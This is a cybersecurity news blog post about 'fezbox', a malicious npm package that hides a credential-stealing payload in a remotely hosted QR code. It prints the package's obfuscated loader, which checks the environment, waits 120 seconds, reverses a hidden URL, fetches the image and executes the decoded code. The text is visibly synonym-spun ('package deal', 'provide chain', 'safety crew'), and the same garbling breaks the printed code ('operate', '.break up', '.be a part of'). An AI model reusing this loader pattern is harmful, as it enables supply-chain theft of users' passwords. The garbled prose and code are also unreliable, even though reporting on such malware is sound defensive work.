Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code

Posted on September 23, 2025September 24, 2025 By CWS

A complicated malware marketing campaign has emerged within the npm ecosystem, using an progressive steganographic approach to hide malicious code inside QR codes.

The malicious package deal, recognized as “fezbox,” presents itself as a respectable JavaScript/TypeScript utility library whereas secretly executing password-stealing operations via a cleverly disguised QR code payload.

This assault represents a major evolution in provide chain threats, demonstrating how cybercriminals are adopting more and more inventive strategies to bypass safety measures and evade detection programs.

The fezbox package deal masquerades as a complete utility library providing TypeScript assist, efficiency optimization, and modular performance.

Based on its documentation, the package deal offers widespread helper capabilities organized by function modules, permitting builders to import solely mandatory elements.

Whereas the README file mentions a QR Code Module for producing and parsing QR codes, it intentionally omits essential particulars in regards to the package deal’s functionality to fetch QR codes from distant URLs and execute embedded malicious code.

Picture of the QR code (Supply – Socket.dev)

Socket.dev analysts recognized the malware after detecting suspicious behavioral patterns inside the package deal’s codebase.

The safety crew found a number of layers of obfuscation strategies, together with string reversal, code minification, and the novel use of steganographic QR codes to cover the ultimate payload.

On the time of discovery, the malicious package deal remained energetic on the npm registry, prompting Socket.dev to petition the npm safety crew for its quick removing and the suspension of the menace actor’s account.

Superior Steganographic Payload Supply

The malware employs a classy multi-stage execution course of that begins with environmental checks and timing delays to evade sandbox detection.

The preliminary malicious code accommodates browser-specific conditionals that confirm the presence of window and doc objects, making certain execution solely happens in respectable browser environments.

When circumstances are met, the malware waits 120 seconds earlier than initiating the payload retrieval course of.

The core malicious performance revolves round a reversed URL string that conceals the placement of the steganographic QR code:-

(operate () {
if (n.isDevelopment() || c.probability(2 / 3))
return;
setTimeout(async () => {
const loader = new d.QRCodeScriptLoader();
const t = await loader.parseQRCodeFromUrl(
“gpj.np6f7h_ffe7cdb1b812207f70f027671c18c25b/6177675571v/daolpu/egami/qsqbneuhd/moc.yrani”
.break up(“”)
.reverse()
.be a part of(“”)
);
loader.executeCode(t);
}, 120 * 1e3);
})();

When reversed, this string resolves to a Cloudinary-hosted QR code picture containing the ultimate malicious payload. The QR code itself serves as a steganographic container, hiding JavaScript code that extracts username and password values from browser cookies.

As soon as decoded, the payload makes an attempt to find cookies containing authentication credentials, particularly looking for “username” and “password” fields utilizing further string obfuscation strategies.

The extracted credentials are then exfiltrated via an HTTPS POST request to a command-and-control server hosted on Railway, a cloud platform service.

This multi-layered method – combining environmental evasion, timing delays, string reversal, steganographic concealment, and credential extraction – represents a classy evolution in npm-based provide chain assaults that safety groups should put together to defend towards.

Observe us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Browser, Code, Malware, NPM, Package, Passwords, Steals, Steganographic

Post navigation

Previous Post: Zloader Malware Repurposed to Act as Entry Point Into Corporate Environments to Deploy Ransomware
Next Post: Threat Actors Breaking to Enterprise Infrastructure Within 18 Minutes From Initial Access

Related Posts

Graphite Spyware Exploits Apple iOS Zero-Click Vulnerability to Attack Journalists Cyber Security News
South Asian APT Hackers Using Novel Tools to Compromise Phones of Military-Adjacent Members Cyber Security News
Ubuntu’s Kernel Vulnerability Let Attackers Escalate Privileges and Gain Root Access Cyber Security News
WordPress GravityForms Plugin Hacked to Include Malicious Code Cyber Security News
Hackers Using Generative AI ‘ChatGPT’ to Evade Anti-virus Defenses Cyber Security News
APT35 Hacker Groups Internal Documents Leak Exposes their Targets and Attack Methods Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Critical MongoDB Vulnerability Exposes Sensitive Data via Zlib Compression
  • SEC Files Charges Over $14 Million Crypto Scam Using Fake AI-Themed Investment Tips
  • WebRAT Malware via GitHub Repositories Claim as Proof-of-concept Exploits to Attack Users
  • Ransomware Attack on Romanian Waters Authority
  • Italy Fines Apple €98.6 Million Over ATT Rules Limiting App Store Competition

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Critical MongoDB Vulnerability Exposes Sensitive Data via Zlib Compression
  • SEC Files Charges Over $14 Million Crypto Scam Using Fake AI-Themed Investment Tips
  • WebRAT Malware via GitHub Repositories Claim as Proof-of-concept Exploits to Attack Users
  • Ransomware Attack on Romanian Waters Authority
  • Italy Fines Apple €98.6 Million Over ATT Rules Limiting App Store Competition

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2025 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark